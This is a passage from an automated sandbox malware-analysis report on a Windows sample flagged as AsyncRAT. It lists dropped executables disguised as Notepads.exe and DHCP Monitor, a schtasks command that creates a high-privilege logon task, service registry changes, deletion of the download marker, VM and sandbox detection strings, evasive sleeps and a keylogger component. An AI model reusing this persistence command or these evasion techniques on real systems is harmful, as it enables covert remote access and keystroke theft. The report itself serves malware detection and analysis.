Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ame.exe
Source: C:\Users\user\AppData\Local\Temp\ame.exe File created: C:\Users\user\AppData\Roaming\Notepads.exe
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fi.exe
Source: C:\Users\user\AppData\Local\Temp\fi.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Boot Survival:

Yara detected AsyncRAT
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
Creates or modifies windows services
Source: C:\Users\user\AppData\Local\Temp\ame.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage
Modifies existing windows services
Source: C:\Users\user\AppData\Local\Temp\ame.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Users\user\AppData\Local\Temp\fi.exe:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Notepads.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AsyncRAT
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Notepads.exe Binary or memory string: SBIEDLL.DLL
Source: wscript.exe, 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, ame.exe, 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Notepads.exe, 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Notepads.exe.3.dr Binary or memory string: SBIEDLL.DLLME: CHAT
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ame.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fi.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Notepads.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\fi.exe Window / User API: foregroundWindowGot 933
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\ame.exe TID: 6628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6692 Thread sleep time: -200000s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6984 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Notepads.exe TID: 3000 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\Notepads.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_02340D66 GetSystemInfo, 4_2_02340D66
Source: C:\Users\user\AppData\Local\Temp\ame.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fi.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Notepads.exe Thread delayed: delay time: 922337203685477
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes6
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp Binary or memory string: $Hyper-V Hypervisor Logical Processor
Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes[
Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor.
Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.594189844.000000000150C000.00000004.00000020.sdmp, Notepads.exe, 0000001E.00000002.575946515.0000000001378000.00000004.00000020.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition~
Source: Notepads.exe, 0000001E.00000002.587730266.000000001BF61000.00000004.00000001.sdmp Binary or memory string: &Hyper-V Hypervisorw
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Notepads.exe, 0000001A.00000003.562811005.000000001BFAF000.00000004.00000001.sdmp Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipesk|
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp Binary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipesx
Source: Notepads.exe, 0000001A.00000002.603514623.000000001C841000.00000004.00000001.sdmp Binary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186P
Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes:
Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes*
Source: ame.exe, 00000003.00000003.526302917.000000001B2B7000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp Binary or memory string: *Hyper-V Virtual Machine Bus Provider Pipes
Source: ame.exe, 00000003.00000002.555441828.000000001C01C000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes[
Source: Notepads.exe.3.dr Binary or memory string: vmware
Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus]
Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: ame.exe, 00000003.00000003.526156092.000000001C056000.00000004.00000001.sdmp Binary or memory string: st Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: Notepads.exe, 0000001A.00000003.562007200.000000001C859000.00000004.00000001.sdmp Binary or memory string: lows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWance%SystemRoot%\system32\mswsock.dll2e,00,4e,00,45,00,54,00,20,00,43,00,4c,00,52,00,20,00,44,00,61,00,74,00,61,00,00,00,00,00.NET CLR Data6
Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus
Source: ame.exe, 00000003.00000003.526118644.000000001C031000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000003.574433837.000000001BCD9000.00000004.00000001.sdmp Binary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp Binary or memory string: Hyper-V Hypervisor
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx BusM
Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp Binary or memory string: !Hyper-V Hypervisor Root Partition
Source: ame.exe, 00000003.00000002.534630144.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider PipesP
Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\fi.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Notepads.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ame.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: ame.exe.1.dr
.NET source code references suspicious native API functions
Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: dhcpmon.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
